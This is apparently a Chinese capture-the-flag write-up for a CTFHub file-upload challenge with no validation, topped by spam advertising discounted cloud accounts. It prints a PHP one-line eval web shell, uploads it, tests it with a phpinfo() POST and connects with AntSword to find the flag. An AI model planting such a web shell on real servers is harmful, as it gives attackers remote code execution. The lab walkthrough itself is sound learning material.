CTFHub | 无验证
阿里云国内75折 回扣 微信号:monov8 |
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6 |
0x00 前言
CTFHub 专注网络安全、信息安全、白帽子技术的在线学习实训平台。提供优质的赛事及学习服务拥有完善的题目环境及配套 writeup 降低 CTF 学习入门门槛快速帮助选手成长跟随主流比赛潮流。
0x01 题目描述
无验证
无
0x02 解题过程
根据网页提示内容这题应该和文件上传有关并且有文件上传模块。
Ⅰ网页提示文件上传是无限制的那么构造shell不用做任何限制使用最简单的一句话木马应该就可以成功连接
<?php @eval($_POST['shell']); ?> #shell为一句话连接密码
Ⅱ点击网页中的选择文件将刚刚编写好的shell文件上传提示上传成功
Ⅲ使用Hackbar工具提交POST请求验证刚刚上传的shell木马是否成功
shell=phpinfo(); #shell密码=phpinfo(); 连接到PHP info查看PHP相关信息
Ⅳ验证刚刚上传的shell木马成功后可以使用蚁剑连接一句话木马点击测试连接显示连接成功
Ⅴ测试连接成功后可以直接点击添加数据那么蚁剑即可成功连接一句话木马
Ⅵ点击刚刚添加成功的数据
Ⅶ找了半天发现关于flag的文件居然在html文件夹中
Ⅷ点击查看flag_205621433.php文件中的信息发现此题flag
0x03 总结
文章内容为学习记录的笔记由于作者水平有限文中若有错误与不足欢迎留言便于及时更正。